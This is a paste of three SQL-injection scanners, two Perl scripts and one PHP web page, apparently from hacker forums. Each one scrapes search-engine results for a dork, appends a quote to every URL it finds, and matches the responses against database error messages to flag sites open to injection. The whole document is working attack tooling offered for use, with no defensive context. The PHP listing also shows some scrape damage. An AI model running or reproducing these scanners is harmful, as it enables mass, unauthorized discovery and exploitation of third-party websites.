PERL DORK SCANNER

#!/usr/bin/perl
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. Script : SQLi Vulnerable Scanner .:.
# .:. Version : 3.0 fixed (06/10/2012) .:.
# .:. Author : Metropolis .:.
# .:. Home : https://www1.r00tw0rm.com/ .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. MySQL Injection .:.
# .:. MSAccess Injection .:.
# .:. MSSQL Injection .:.
# .:. Oracle Injection .:.
# .:. Blind Injection .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# Useless version :
# http://pastebin.com/kKxCCJuU 1.0
# http://pastebin.com/FyPcTLRw 2.0
use LWP::UserAgent;
use Getopt::Std;
getopt('kpo', \%opts);
if($opts{'k'} eq '')
{
print "[Help] SQLi.pl -k shopping.php?id= -p 500\n"; # Max: 50,100,500,700,etc...
}
if($opts{'p'} eq '')
{
$opts{'p'} = 1;
}
print <<"Metropolis_intro";
___________
|.---------.|
|| ||
|| scanner ||
|| ||
|'---------'|
`)__ ____('
[=== -- o ]--.
__'---------'__ \
[::::::::::: :::] )
`""'"""""'""""`/T\\
\\_/
Metropolis_intro
system('COLOR A');
print "\n\n[Script] SQLi Vulnerable Scanner (MySQL,MSAccess,MSSQL,Oracle,Blind)\n";
print "[Author] Metropolis\n\n\n\n";
for($start = 0;$start != $opts{'p'}*10;$start += 10)
{
$t = "http://www.google.fr/search?hl=fr&q=".$opts{'k'}."&btnG=Search&start=".
$start;
$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12)
Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E");
$response = $ua->get($t);
if ($response->is_success)
{
$c = $response->content;
@stuff = split(/<a href=/,$c);
foreach $line(@stuff)
{
if($line =~/(.*) class=l/ig)
{
$out = $1;
$out =~ s/"//g;
$out =~s/$/\'/;
$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$response = $ua->get($out);
$error = $response->content();
if($error =~m/SQL syntax/)
{print "$out Vulnerable MySQL!\n";}
elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft
Access Driver/)
{print "$out Vulnerable MS Access!\n";}
elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error
=~m/Unclosed quotation mark/)
{print "$out Vulnerable MSSQL!\n";}
elsif($error =~m/mysql_fetch_array()/ || $error =~m/mysql_num_rows()/)
{print "$out Vulnerable Blind Possible!\n";}
elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
{print "$out Vulnerable Oracle!\n";}
}
}
}
}

perl2

1. #!/usr/bin/perl
2.    use LWP::Simple;
3.    use LWP::UserAgent;
4.    use HTTP::Request;
5.    my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }
6.    print "+++++++++++++++++++++++++++++++\n";
7.    print "+     SQL - Google Search     +\n";
8.    print "+       CWH Underground       +\n";
9.    print "+++++++++++++++++++++++++++++++\n\n";
10.    print "Insert Dork:";
11.    chomp( my $dork = <STDIN> );
12.    print "Total Query Pages (10 Links/Pages) :";
13.    chomp( my $page = <STDIN> );
14.    print "\n
16.     * Result:\n\n";
18.    for($start = 0;$start != $page*10;$start += 10)
19.    {  
20.    $t = "http://www.google.com/search?hl=en&q=".$dork."&btnG=Search&start=".$start;
21.        $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2');
22.        $ua->timeout(10);
23.        $ua->env_proxy;
24.        $response = $ua->get($t);
25.        if ($response->is_success)
26.        {
27.            $c = $response->content;
28.            @stuff = split(/<a href=/,$c);
29.            foreach $line(@stuff)
30.            {
31.                if($line =~/(.*) class=l/ig)
32.                {
33.                    $out = $1;
34.                    $out =~ s/\"//g;
35.          $out =~s/$/\'/;  
36.          $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2');
37.          $ua->timeout(10);
38.          $ua->env_proxy;
39.          $response = $ua->get($out);
40.          $error = $response->content();
41.          if($error =~m/mysql_/ || $error =~m/Division by zero in/ || $error =~m/Warning:/)
42.             {print "$out => Could be Vulnerable in MySQL Injection!!\n";}
43.          elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
44.             {print "$out => Could be Vulnerable in MS Access Injection!!\n";}
45.          elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
46.             {print "$out => Could be Vulnerable in MSSQL Injection!!\n";}
47.          elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
48.             {print "$out => Could be Vulnerable in Oracle Injection!!\n";}
49.           }
50.       }
51.        }
52.         }

php

1. <php
2. <html>
3. <head>
4. <title>m0bil3_xT's SQLi Scanner</title>
6. <center><img src="http://i.imgur.com/lH3GO.png">
7. </center>
9. </head>
10. <body bgcolor=#000000>
12. <style>
13. body{
14. font: 10pt Verdana;
15. }
16. tr {
17. BORDER-RIGHT: #3e3e3e 1px solid;
18. BORDER-TOP: #3e3e3e 1px solid;
19. BORDER-LEFT: #3e3e3e 1px solid;
20. BORDER-BOTTOM: #3e3e3e 1px solid;
21. color: #ff9900;
22. }
23. td {
24. BORDER-RIGHT: #3e3e3e 1px solid;
25. BORDER-TOP: #3e3e3e 1px solid;
26. BORDER-LEFT: #3e3e3e 1px solid;
27. BORDER-BOTTOM: #3e3e3e 1px solid;
28. color: #2BA8EC;
29. font: 10pt Verdana;
30. }
32. table {
33. BORDER-RIGHT: #3e3e3e 1px solid;
34. BORDER-TOP: #3e3e3e 1px solid;
35. BORDER-LEFT: #3e3e3e 1px solid;
36. BORDER-BOTTOM: #3e3e3e 1px solid;
37. BACKGROUND-COLOR: #111;
38. }
41. input {
42. BORDER-RIGHT: #3e3e3e 1px solid;
43. BORDER-TOP: #3e3e3e 1px solid;
44. BORDER-LEFT: #3e3e3e 1px solid;
45. BORDER-BOTTOM: #3e3e3e 1px solid;
46. BACKGROUND-COLOR: Black;
47. font: 10pt Verdana;
48. color: #ff9900;
49. }
51. input.submit {
52. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
53. color: #FFFFFF;
54. border-color: #009900;
55. }
57. code {
58. border   : dashed 0px #333;
59. BACKGROUND-COLOR: Black;
60. font: 10pt Verdana bold;
61. color: while;
62. }
64. run {
65. border   : dashed 0px #333;
66. font: 10pt Verdana bold;
67. color: #FF00AA;
68. }
70. textarea {
71. BORDER-RIGHT: #3e3e3e 1px solid;
72. BORDER-TOP: #3e3e3e 1px solid;
73. BORDER-LEFT: #3e3e3e 1px solid;
74. BORDER-BOTTOM: #3e3e3e 1px solid;
75. BACKGROUND-COLOR: #1b1b1b;
76. font: Fixedsys bold;
77. color: #aaa;
78. }
79. A:link {
80. COLOR: #2BA8EC; TEXT-DECORATION: none
81. }
82. A:visited {
83. COLOR: #2BA8EC; TEXT-DECORATION: none
84. }
85. A:hover {
86. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
87. color: #ff9900; TEXT-DECORATION: none
88. }
89. A:active {
90. color: Red; TEXT-DECORATION: none
91. }
93. .listdir tr:hover{
94. background: #444;
95. }
96. .listdir tr:hover td{
97. background: #444;
98. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
99. color: #FFFFFF; TEXT-DECORATION: none;
100. }
101. .notline{
102. background: #111;
103. }
104. .line{
105. background: #222;
106. }
107. </style>
109. <center>
110. <br/>
112. <?php
114. echo "<font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(300, 0,
116. 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;' size='5'> </font><br><font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px
118. rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;'
120. size='5'></font></b><br><br><center><a href='
122. target='_blank'></a><br><a</a></center><br></font><center><font style='text-shadow: 0px 0px 6px rgb(255, 0,
124. 0), 0px 0px 5px rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff;
126. font-weight:bold;' size='2'></font><br><br></center>";
128. $your_ip        = $_SERVER['REMOTE_ADDR'];
129. echo "<font style='text-shadow:0px 0px 10px #12E12E; font-weight:bold;' color=#FF0000
131. size='2'>Your IP : </font><font style='text-shadow:0px 0px 10px #12E12E;
133. font-weight:bold;' color=#FF0000 size='2'>$your_ip</font><br>";
135. $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
136. echo "<font style='text-shadow:0px 0px 10px #12E12E; font-weight:bold;' color=#FF0000
138. size='2'>Server IP : </font><font style='text-shadow:0px 0px 10px #12E12E;
140. font-weight:bold;' color=#FF0000 size='2'>$server_ip </font><br><br>";
142. echo '<form method="post" action=""><font color="red">Dork :</font> <input type="text"
144. value="" name="dork" size="20"/><input type="submit" name="scan"
146. value="Scan"></form></center>';
148. ob_start();
149. set_time_limit(0);
151. if (isset($_POST['scan'])) {
153. $browser = $_SERVER['HTTP_USER_AGENT'];
155. $first = "startgoogle.startpagina.nl/index.php?q=";
156. $sec = "&start=";
157. $reg = '/<p class="g"><a href="(.*)" target="_self" onclick="/';
159. for($id=0 ; $id<=30; $id++){
160. $page=$id*10;
161. $dork=urlencode($_POST['dork']);
162. $url = $first.$dork.$sec.$page;
164. $curl = curl_init($url);
165. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
166. curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
167. $result = curl_exec($curl);
168. curl_close($curl);
170. preg_match_all($reg,$result,$matches);
172. foreach($matches[1] as $site){
174. $url = preg_replace("/=/", "='", $site);
175. $curl=curl_init();
176. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
177. curl_setopt($curl,CURLOPT_URL,$url);
178. curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
179. curl_setopt($curl,CURLOPT_TIMEOUT,'5');
180. $GET=curl_exec($curl);
181. if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute
183. query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch&#8203;_row
185. ()|SELECT *
187. FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) {
188. echo '<center><b><font color="#E10000">Found : </font><a href="'.$url.'"
190. target="_blank">'.$url.'</a><font color=#FF0000> &#60;-- SQLI Vuln
192. Found..</font></b></center>';
193. ob_flush();flush();
194. }else{
195. echo '<center><font color="#FFFFFF"><b>'.$url.'</b></font><font color="#0FFF16">
197. &#60;-- Not Vuln</font></center>';
198. ob_flush();flush();
199. }
201. ob_flush();flush();
202. }
203. ob_flush();flush();
204. }
205. ob_flush();flush();
206. }
208. ?>
209. </body>
210. </html>